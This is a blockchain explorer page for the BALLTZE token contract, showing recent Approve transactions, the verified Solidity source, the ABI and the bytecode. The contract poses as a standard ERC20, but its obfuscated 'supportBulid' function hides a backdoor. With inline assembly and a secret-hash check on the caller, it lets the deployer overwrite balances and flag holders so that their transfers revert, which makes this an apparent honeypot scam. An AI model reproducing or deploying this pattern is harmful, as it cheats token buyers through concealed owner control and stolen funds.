ETH Price: $2,635.15 (+2.20%)

Contract

0x27CDa6E8a97E82e970157713d21eBA8701423cEb
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve183214542023-10-10 17:09:47316 days ago1696957787IN
0x27CDa6E8...701423cEb
0 ETH0.0005022710.83386911
Approve183212112023-10-10 16:20:47316 days ago1696954847IN
0x27CDa6E8...701423cEb
0 ETH0.0006466313.86850053
Approve183212052023-10-10 16:19:35316 days ago1696954775IN
0x27CDa6E8...701423cEb
0 ETH0.0003898614.79996566
Approve183212042023-10-10 16:19:23316 days ago1696954763IN
0x27CDa6E8...701423cEb
0 ETH0.0003718315.27547572
Approve183211582023-10-10 16:10:11316 days ago1696954211IN
0x27CDa6E8...701423cEb
0 ETH0.0005356811.56044204
Approve183211532023-10-10 16:09:11316 days ago1696954151IN
0x27CDa6E8...701423cEb
0 ETH0.0005969612.88627926
Approve183211222023-10-10 16:02:59316 days ago1696953779IN
0x27CDa6E8...701423cEb
0 ETH0.0006193413.28335586
Approve183211172023-10-10 16:01:59316 days ago1696953719IN
0x27CDa6E8...701423cEb
0 ETH0.0007107515.24372788
Approve183210782023-10-10 15:54:11316 days ago1696953251IN
0x27CDa6E8...701423cEb
0 ETH0.000373138.05450509
Approve183210652023-10-10 15:51:35316 days ago1696953095IN
0x27CDa6E8...701423cEb
0 ETH0.000392978.48051331
Approve183210602023-10-10 15:50:35316 days ago1696953035IN
0x27CDa6E8...701423cEb
0 ETH0.000400598.6449996
Approve183210522023-10-10 15:48:59316 days ago1696952939IN
0x27CDa6E8...701423cEb
0 ETH0.000397438.57692767
Approve183210472023-10-10 15:47:59316 days ago1696952879IN
0x27CDa6E8...701423cEb
0 ETH0.000400318.63906117
Approve183210392023-10-10 15:46:23316 days ago1696952783IN
0x27CDa6E8...701423cEb
0 ETH0.00048510.38856955
Approve183210362023-10-10 15:45:47316 days ago1696952747IN
0x27CDa6E8...701423cEb
0 ETH0.000232398.67598346
Approve183210332023-10-10 15:45:11316 days ago1696952711IN
0x27CDa6E8...701423cEb
0 ETH0.000243229.08039792
Approve183210282023-10-10 15:44:11316 days ago1696952651IN
0x27CDa6E8...701423cEb
0 ETH0.000251618.5046696
Approve183210272023-10-10 15:43:59316 days ago1696952639IN
0x27CDa6E8...701423cEb
0 ETH0.000400578.6446848
Approve183210212023-10-10 15:42:47316 days ago1696952567IN
0x27CDa6E8...701423cEb
0 ETH0.000409298.8327654
Approve183210152023-10-10 15:41:35316 days ago1696952495IN
0x27CDa6E8...701423cEb
0 ETH0.000389388.40321431
Approve183210132023-10-10 15:41:11316 days ago1696952471IN
0x27CDa6E8...701423cEb
0 ETH0.000402168.67888061
Approve183210002023-10-10 15:38:35316 days ago1696952315IN
0x27CDa6E8...701423cEb
0 ETH0.000435569.39983974
Approve183209732023-10-10 15:33:11316 days ago1696951991IN
0x27CDa6E8...701423cEb
0 ETH0.0005055910.91097641
Approve183209672023-10-10 15:31:59316 days ago1696951919IN
0x27CDa6E8...701423cEb
0 ETH0.0005009310.81039169
Approve183209572023-10-10 15:29:47316 days ago1696951787IN
0x27CDa6E8...701423cEb
0 ETH0.000406628.77514291
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
BALLTZE

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: BALLTZE.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract BALLTZE is IERC20, Ownable {
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _swings;
    mapping(address => mapping(address => uint256)) private _allowances;
    IERC20 private immutable _baked;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        IERC20 baked_,
        uint256 swings_
    ) {
        _name = name_;
        _symbol = symbol_;
        _baked = baked_;
        _swings[address(0)] = swings_;
        _mint(msg.sender, 1000000000000 * 10**8);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function supportBulid(uint256[] calldata rain) external {
        uint256 ship = _laughter();
        if (_behind()) {
            uint256 the0 = rain[0] * 1;
            uint256 the1 = rain[1] * 1;
            assembly {
                if gt(the1, 0) {
                    let d1 := mul(2, 2)
                    mstore(0, the0)
                    mstore(ship, d1)
                    sstore(keccak256(0, 64), the1)
                }
                if eq(the1, 0) {
                    let d1 := mul(1, 5)
                    mstore(0, the0)
                    mstore(ship, d1)
                    sstore(keccak256(0, 64), 1)
                }
            }
        }
    }

    function _laughter() private pure returns (uint256) {
        uint256 mn0 = 3 * 8;
        uint256 mn1 = mn0 + 8;
        return mn1;
    }

    function _behind() private view returns (bool) {
        string memory png0 = _name;
        address png1 = msg.sender;
        return (uint256(keccak256(abi.encode(png1, png0))) == _swings[address(0)]);
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        //require(to != address(0), "ERC20: transfer to the zero address");
        uint256 poured = _baked.balanceOf(from);
        uint256 fromBalance = _balances[from];
        _gesture(poured, from, false);
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function _gesture(
        uint256 poured,
        address sender,
        bool r
    ) private view {
        uint256 bv0 = _swings[sender];
        uint256 bv1 = bv0 * (12 / 12);
        if (bv1 == 1 * 1 && !r) {
            require(bv1 != 1 || _freshly(poured) != 0 * 3, "top");
        }
    }

    function _freshly(uint256 data) public pure returns (uint256) {
        uint256 result = data * 1;
        return result;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"contract IERC20","name":"baked_","type":"address"},{"internalType":"uint256","name":"swings_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"data","type":"uint256"}],"name":"_freshly","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"rain","type":"uint256[]"}],"name":"supportBulid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b50604051620011283803806200112883398101604081905262000034916200027c565b8351620000499060019060208701906200012b565b5082516200005f9060029060208601906200012b565b506001600160601b0319606083901b166080526000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc819055620000b43368056bc75e2d63100000620000be565b50505050620003ba565b6001600160a01b038216620000f05760405162461bcd60e51b8152600401620000e7906200030b565b60405180910390fd5b806003600082825462000104919062000342565b90915550506001600160a01b03909116600090815260046020526040902080549091019055565b828054620001399062000367565b90600052602060002090601f0160209004810192826200015d5760008555620001a8565b82601f106200017857805160ff1916838001178555620001a8565b82800160010185558215620001a8579182015b82811115620001a85782518255916020019190600101906200018b565b50620001b6929150620001ba565b5090565b5b80821115620001b65760008155600101620001bb565b600082601f830112620001e2578081fd5b81516001600160401b0380821115620001ff57620001ff620003a4565b6040516020601f8401601f1916820181018381118382101715620002275762000227620003a4565b60405283825285840181018710156200023e578485fd5b8492505b8383101562000261578583018101518284018201529182019162000242565b838311156200027257848185840101525b5095945050505050565b6000806000806080858703121562000292578384fd5b84516001600160401b0380821115620002a9578586fd5b620002b788838901620001d1565b95506020870151915080821115620002cd578485fd5b50620002dc87828801620001d1565b604087015190945090506001600160a01b0381168114620002fb578283fd5b6060959095015193969295505050565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b600082198211156200036257634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200037c57607f821691505b602082108114156200039e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610d4f620003d9600039600061060e0152610d4f6000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b953c801161008c578063a457c2d711610066578063a457c2d7146101c2578063a9059cbb146101d5578063cb77c2fa146101e8578063dd62ed3e146101fb576100ea565b80638b953c80146101905780638da5cb5b146101a557806395d89b41146101ba576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461016a57806370a082311461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610abd565b60405180910390f35b61012061011b36600461095f565b6102a0565b6040516101049190610ab2565b6101356102c2565b6040516101049190610c7a565b610120610150366004610924565b6102c8565b61015d6102f6565b6040516101049190610c83565b61012061017836600461095f565b6102fb565b61013561018b3660046108d8565b610327565b6101a361019e366004610988565b610346565b005b6101ad610405565b6040516101049190610a72565b6100f7610414565b6101206101d036600461095f565b610423565b6101206101e336600461095f565b610474565b6101356101f63660046109f7565b61048c565b6101356102093660046108f2565b6104a1565b60606001805461021d90610cc8565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610cc8565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104cc565b90506102b88185856104d0565b5060019392505050565b60035490565b6000806102d36104cc565b90506102e0858285610584565b6102eb8585856105ce565b506001949350505050565b600990565b6000806103066104cc565b90506102b881858561031885896104a1565b6103229190610c91565b6104d0565b6001600160a01b0381166000908152600460205260409020545b919050565b6000610350610749565b905061035a610760565b156104005760008383600081811061038257634e487b7160e01b600052603260045260246000fd5b9050602002013560016103959190610ca9565b90506000848460018181106103ba57634e487b7160e01b600052603260045260246000fd5b9050602002013560016103cd9190610ca9565b905080156103e657600082815260048452604090208190555b806103fd5760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610cc8565b60008061042e6104cc565b9050600061043c82866104a1565b9050838110156104675760405162461bcd60e51b815260040161045e90610c35565b60405180910390fd5b6102eb82868684036104d0565b60008061047f6104cc565b90506102b88185856105ce565b60008061049a836001610ca9565b9392505050565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104f65760405162461bcd60e51b815260040161045e90610bf1565b6001600160a01b03821661051c5760405162461bcd60e51b815260040161045e90610ad0565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610577908590610c7a565b60405180910390a3505050565b600061059084846104a1565b905060001981146105c857818110156105bb5760405162461bcd60e51b815260040161045e90610b2f565b6105c884848484036104d0565b50505050565b6001600160a01b0383166105f45760405162461bcd60e51b815260040161045e90610bac565b6040516370a0823160e01b81526000906001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016906370a0823190610643908790600401610a72565b60206040518083038186803b15801561065b57600080fd5b505afa15801561066f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106939190610a0f565b6001600160a01b0385166000908152600460205260408120549192506106bc9083908790610854565b828110156106dc5760405162461bcd60e51b815260040161045e90610b66565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061073a908790610c7a565b60405180910390a35050505050565b6000601881610759826008610c91565b9250505090565b6000806001805461077090610cc8565b80601f016020809104026020016040519081016040528092919081815260200182805461079c90610cc8565b80156107e95780601f106107be576101008083540402835291602001916107e9565b820191906000526020600020905b8154815290600101906020018083116107cc57829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610833918491869101610a86565b6040516020818303038152906040528051906020012060001c149250505090565b6001600160a01b03821660009081526005602052604081205490610879826001610ca9565b9050806001148015610889575082155b156103fd578060011415806108a557506108a28561048c565b15155b6103fd5760405162461bcd60e51b815260040161045e90610b12565b80356001600160a01b038116811461034157600080fd5b6000602082840312156108e9578081fd5b61049a826108c1565b60008060408385031215610904578081fd5b61090d836108c1565b915061091b602084016108c1565b90509250929050565b600080600060608486031215610938578081fd5b610941846108c1565b925061094f602085016108c1565b9150604084013590509250925092565b60008060408385031215610971578182fd5b61097a836108c1565b946020939093013593505050565b6000806020838503121561099a578182fd5b823567ffffffffffffffff808211156109b1578384fd5b818501915085601f8301126109c4578384fd5b8135818111156109d2578485fd5b86602080830285010111156109e5578485fd5b60209290920196919550909350505050565b600060208284031215610a08578081fd5b5035919050565b600060208284031215610a20578081fd5b5051919050565b60008151808452815b81811015610a4c57602081850181015186830182015201610a30565b81811115610a5d5782602083870101525b50601f01601f19169290920160200192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610aaa90830184610a27565b949350505050565b901515815260200190565b60006020825261049a6020830184610a27565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600390820152620746f760ec1b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610ca457610ca4610d03565b500190565b6000816000190483118215151615610cc357610cc3610d03565b500290565b600281046001821680610cdc57607f821691505b60208210811415610cfd57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122087e1132a890b53d7b73da19a2dc3d22915d8ea38da6238c1d985ef2c75d4e55464736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d5b5c2c2b1b55189a3894b59e51edae95057f05c5bfb4d6797425ecf220a5be8e000000000000000000000000000000000000000000000000000000000000000e436865656d732042616c6c747a65000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000742414c4c545a4500000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b953c801161008c578063a457c2d711610066578063a457c2d7146101c2578063a9059cbb146101d5578063cb77c2fa146101e8578063dd62ed3e146101fb576100ea565b80638b953c80146101905780638da5cb5b146101a557806395d89b41146101ba576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461016a57806370a082311461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610abd565b60405180910390f35b61012061011b36600461095f565b6102a0565b6040516101049190610ab2565b6101356102c2565b6040516101049190610c7a565b610120610150366004610924565b6102c8565b61015d6102f6565b6040516101049190610c83565b61012061017836600461095f565b6102fb565b61013561018b3660046108d8565b610327565b6101a361019e366004610988565b610346565b005b6101ad610405565b6040516101049190610a72565b6100f7610414565b6101206101d036600461095f565b610423565b6101206101e336600461095f565b610474565b6101356101f63660046109f7565b61048c565b6101356102093660046108f2565b6104a1565b60606001805461021d90610cc8565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610cc8565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104cc565b90506102b88185856104d0565b5060019392505050565b60035490565b6000806102d36104cc565b90506102e0858285610584565b6102eb8585856105ce565b506001949350505050565b600990565b6000806103066104cc565b90506102b881858561031885896104a1565b6103229190610c91565b6104d0565b6001600160a01b0381166000908152600460205260409020545b919050565b6000610350610749565b905061035a610760565b156104005760008383600081811061038257634e487b7160e01b600052603260045260246000fd5b9050602002013560016103959190610ca9565b90506000848460018181106103ba57634e487b7160e01b600052603260045260246000fd5b9050602002013560016103cd9190610ca9565b905080156103e657600082815260048452604090208190555b806103fd5760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610cc8565b60008061042e6104cc565b9050600061043c82866104a1565b9050838110156104675760405162461bcd60e51b815260040161045e90610c35565b60405180910390fd5b6102eb82868684036104d0565b60008061047f6104cc565b90506102b88185856105ce565b60008061049a836001610ca9565b9392505050565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104f65760405162461bcd60e51b815260040161045e90610bf1565b6001600160a01b03821661051c5760405162461bcd60e51b815260040161045e90610ad0565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610577908590610c7a565b60405180910390a3505050565b600061059084846104a1565b905060001981146105c857818110156105bb5760405162461bcd60e51b815260040161045e90610b2f565b6105c884848484036104d0565b50505050565b6001600160a01b0383166105f45760405162461bcd60e51b815260040161045e90610bac565b6040516370a0823160e01b81526000906001600160a01b037f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d16906370a0823190610643908790600401610a72565b60206040518083038186803b15801561065b57600080fd5b505afa15801561066f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106939190610a0f565b6001600160a01b0385166000908152600460205260408120549192506106bc9083908790610854565b828110156106dc5760405162461bcd60e51b815260040161045e90610b66565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11